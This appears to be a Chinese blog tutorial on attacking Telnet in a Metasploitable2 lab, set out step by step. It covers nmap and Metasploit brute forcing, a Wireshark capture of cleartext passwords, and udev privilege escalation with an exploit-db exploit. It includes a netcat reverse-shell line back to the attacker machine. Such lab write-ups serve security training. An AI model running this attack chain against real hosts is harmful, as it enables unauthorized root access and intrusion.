4.6、漏洞利用-Telnet

目录

4.6、漏洞利用-Telnet

4.6.1、telnet暴力破解

1、telnet介绍

2、telnet版本介绍

3、telnet密码破解

4、telnet登录测试

4.6.2、telnet认证过程抓包分析

1、Telnet客户端连接telnet服务器

2、Tenet明文密码传输

4.6.3、telnet登录提权

1、msf登录telnet

2、msf连接shell下载exp

3、设置kali nc监听

4、编译执行exp,获取root


4.6、漏洞利用-Telnet

4.6.1、telnet暴力破解

1、telnet介绍

Telnet服务,即远程终端协议服务,使用明文传输用户的所有内容,具有安全隐患。Telnet服务默认使用23端口

2、telnet版本介绍

攻击机kali:192.168.12.128

靶机metasploitable2:192.168.12.129

(1)使用nmap获取

nmap 192.168.12.129
nmap -p 23 -sV 192.168.12.129

6ffbd8190f63464396560be22c18709d.png8c10ad67d3da4c209daa311a22679d54.png

(2)使用metasploit

use auxiliary/scanner/telnet/telnet_version

show options

set rhosts IP

run

成功建立连接后可获得telnet的账号和密码

7c9f7e92fa1741c9bac40f6838ca1f6c.png991c6ea676a543f0a3339a0cd7c8f09b.pngf4585b296af9438794849a8c247b3604.png

3、telnet密码破解

search telnet

use auxiliary/scanner/telnet/telnet_login

show options

set rhosts IP
set user_file /路径
set pass_file /路径
//这里直接用msfadmin/msfadmin登录不再演示

run

50daeedf737740fc86bf3b65bf4543a7.pngc1cec720d23e424a8e85c5d27fc38c27.png8614e69165bc48e096e97a368b95e95b.png

4、telnet登录测试

使用破解好的会话连接telnet,并执行对应的命令

使用sessions -l 列举建立的会话

使用session -i id 使用对应的会话

5c5c269a67f74b9abebaf448fd501d2f.png2e106400c15c4a949f5064d4c7794030.png

5、获取meterpreter shell

4.6.2、telnet认证过程抓包分析

1、Telnet客户端连接telnet服务器

Windows下开启Telnet客户端,连接telnet服务,默认下该服务关闭。

控制面板—>程序和功能—>telnet client

Dos命令框下使用telnet启动客户端,?命令查看帮助。

db559f2cf3674af08e08869c0abcbe39.png652244b7abaf4753846fad40e9259ab1.png5fdfdccd562e4bf6a05acc2714d5c93d.png

2、Tenet明文密码传输

Wireshark抓包分析

对比上述登录命令即可明显得出Telnet使用明文传输内容。

54a0439263964d0ca89310bb2fec8de9.pnge5c7294a1383484ca17533e79962f827.pngddbd70292d4d4f9481a7af2727932cc6.png

4.6.3、telnet登录提权

登录的目的在于提权,掌握系统root权限,具体流程

登录telnet服务
使用session -i连接bash shell
攻击机准备提权文件
通过bash shell将攻击机上的提权文件下载到靶机上
攻击机开启端口监听
在shell中执行,并定义反弹shell执行地址
连接shell,获得root权限

1、msf登录telnet

2、msf连接shell下载exp

攻击机准备提权文件
由于靶机无法直接下载exp,所有必须先将提权文件下载到kali中,修改文件名及后缀,开启kali的http服务,然后从连接的shell中将exp从kali中下载到靶机中。

值得注意的是默认的传输目录是/var/www/html/

另外,下载的exp文件需要在其末尾加入新行,不然后续执行的时候会报no newline的error。

service apache2 start    开启http服务

service apache2 status    查看http状态

cd /var/www/html/    切换到默认传输目录

wget http://www.exploit-db.com/download/8572    使用wget下载exp文件到kali

mv 8572 test.c    修改后缀名

msfadmin@metasploitable:~$ wget "http://192.168.12.128/test.c"
通过shell下载exp到靶机

3、设置kali nc监听

nc -lvp 6666
-l启动监听模式 
-v详细的分析内容
-p指定监听端口

4、编译执行exp,获取root

msfadmin@metasploitable:~$ gcc test.c -o exploit    编译C程序

msfadmin@metasploitable:~$ echo '#!/bin/sh' > /tmp/run    定义执行环境至/run

msfadmin@metasploitable:~$ echo '/bin/netcat -e /bin/sh 192.168.12.128 6666' >> /tmp/run

msfadmin@metasploitable:~$ cat /tmp/run    验证run配置

msfadmin@metasploitable:~$ ps aux | grep udev    查看pid

msfadmin@metasploitable:~$ ./exploit 2747    执行root权限id-1

 执行第一条命令的时候提示在tes.c文件的末尾没有newline,所有要在文件中添加以后再重新下载。

添加空行重新下载后继续。

id    权限id

whoami    我是谁

返回监听端口,结果表明提权成功

  • 3
    点赞
  • 18
    收藏
    觉得还不错? 一键收藏
  • 1
    评论

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值